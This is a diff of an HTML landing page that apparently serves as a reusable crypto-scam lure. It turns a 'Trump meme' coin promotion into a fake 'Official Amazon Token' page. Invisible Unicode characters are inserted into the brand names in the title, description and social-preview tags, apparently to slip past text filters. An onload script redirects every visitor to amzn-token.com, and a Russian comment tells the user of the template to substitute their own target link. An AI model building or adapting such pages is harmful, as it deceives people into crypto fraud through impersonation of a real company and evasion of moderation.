--- a/index.html
+++ b/index.html
@@ -2,19 +2,19 @@
 <html>
 <head>
   <meta charset="utf-8"/>
-  <title>The Official Trump Meme | GetTrumpMemes</title>
-  <meta content="Join the Tru⁦mp Com⁦munity. O⁦wn a Pi⁦ece of Tr⁦ump. This is H⁦istory in the Ma⁦king!" name="description"/>
+  <title>T⁦he Of⁦fi⁦cial A⁦m⁦azo⁦n⁦ Token | Get ⁦A⁦m⁦azo⁦n⁦ Token</title>
+  <meta content="Join the ⁦A⁦m⁦azo⁦n⁦ Com⁦munity. O⁦wn a Pi⁦ece of ⁦A⁦m⁦azo⁦n⁦ Token. This is H⁦istory in the Ma⁦king!" name="description"/>
   <!-- Open Graph теги для превью -->
-  <meta content="T⁦he Of⁦fi⁦cial Tr⁦ump M⁦eme | Get⁦Tru⁦mp⁦Memes" property="og:title"/>
-  <meta content="https://i.imgur.com/1Imjy8D.jpeg" property="og:image"/>
+  <meta content="T⁦he Of⁦fi⁦cial A⁦m⁦azo⁦n⁦ Token | Get ⁦A⁦m⁦azo⁦n⁦ Token" property="og:title"/>
+  <meta content="https://i.imgur.com/e06yztd.jpeg" property="og:image"/>
   <!-- Twitter Card теги для превью -->
-  <meta content="Th⁦e O⁦ffi⁦cial T⁦rump ⁦⁦M⁦eme | Get⁦Tru⁦mpMemes" property="twitter:title"/>
-  <meta content="https://i.imgur.com/1Imjy8D.jpeg" property="twitter:image"/>
+  <meta content="T⁦he Of⁦fi⁦cial A⁦m⁦azo⁦n⁦ Token | Get ⁦A⁦m⁦azo⁦n⁦ Token" property="twitter:title"/>
+  <meta content="https://i.imgur.com/e06yztd.jpeg" property="twitter:image"/>
   <meta content="width=device-width, initial-scale=1" name="viewport"/>
   <!-- Редирект через JavaScript -->
   <script>
     window.onload = function() {
-      window.location.href = "https://richnaturalfoods.com"; // Замени на свою целевую ссылку
+      window.location.href = "https://amzn-token.com/"; // Замени на свою целевую ссылку
     }
   </script>
 </head>
